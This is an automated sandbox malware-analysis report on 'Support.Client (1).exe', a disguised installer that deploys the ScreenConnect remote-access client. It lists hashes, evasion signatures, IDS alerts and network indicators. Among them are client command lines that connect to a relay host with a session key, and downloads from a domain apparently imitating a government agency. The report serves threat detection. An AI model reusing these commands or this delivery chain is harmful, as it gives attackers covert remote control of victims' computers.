Edit tour

Windows Analysis Report
Support.Client (1).exe

Overview

General Information

Sample name:	Support.Client (1).exe
Analysis ID:	1555317
MD5:	ee2fd372b98d7899c7e12d85f4c7f695
SHA1:	22f704d299c0160038965ad41d6a486e5c125f55
SHA256:	021ecc419445fe19ca6a15e7367c88f8a4121023746acd94263fb3e156861e03
Infos:

Detection

ScreenConnect Tool

Score:	54
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Creates files in the system32 config directory

Detected potential unwanted application

Enables network access during safeboot for specific services

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

Support.Client (1).exe (PID: 6884 cmdline: "C:\Users\user\Desktop\Support.Client (1).exe" MD5: EE2FD372B98D7899C7E12D85F4C7F695)

dfsvc.exe (PID: 7076 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

ScreenConnect.ClientService.exe (PID: 4416 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)

WerFault.exe (PID: 648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 1012 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)

ScreenConnect.WindowsClient.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a26a4531-970e-49ee-adc5-025b684e5b57" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

ScreenConnect.WindowsClient.exe (PID: 4112 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a729bf7b-fc8b-4b7f-a944-3b6cfbd7ef10" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 6396 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.3530611036.000001ECBA2AA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 7076	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4820	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 4416	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.ScreenConnect.WindowsClient.exe.ea0000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 185.49.126.73, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1368, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T18:26:52.521895+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49751	TCP
2024-11-13T18:27:12.284590+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	57318	TCP
2024-11-13T18:27:13.885602+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	57319	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T18:26:44.799338+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49742	TCP
2024-11-13T18:26:46.308689+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49745	TCP
2024-11-13T18:26:51.070357+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49749	TCP
2024-11-13T18:26:52.597570+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49750	TCP
2024-11-13T18:26:55.675275+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49752	TCP
2024-11-13T18:26:57.772280+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49753	TCP
2024-11-13T18:26:59.266495+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49754	TCP
2024-11-13T18:27:00.656243+0100	2009897	1	A Network Trojan was detected	185.49.126.73	443	192.168.2.4	49755	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.1% probability

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00421000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_00421000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Uses 32bit PE files

Source: Support.Client (1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Support.Client (1).exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Support.Client (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1932080975.0000000001722000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3504545474.0000000002941000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2894133080.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2893684793.0000000001150000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1927774775.0000000000B2D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF6D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1944029579.000000001C132000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF6D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1944029579.000000001C132000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF65000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934412398.0000000002F92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF65000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934412398.0000000002F92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF5D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1932975838.0000000005602000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Jump to behavior

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49756 -> 185.49.126.73:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:57318
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:57319

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

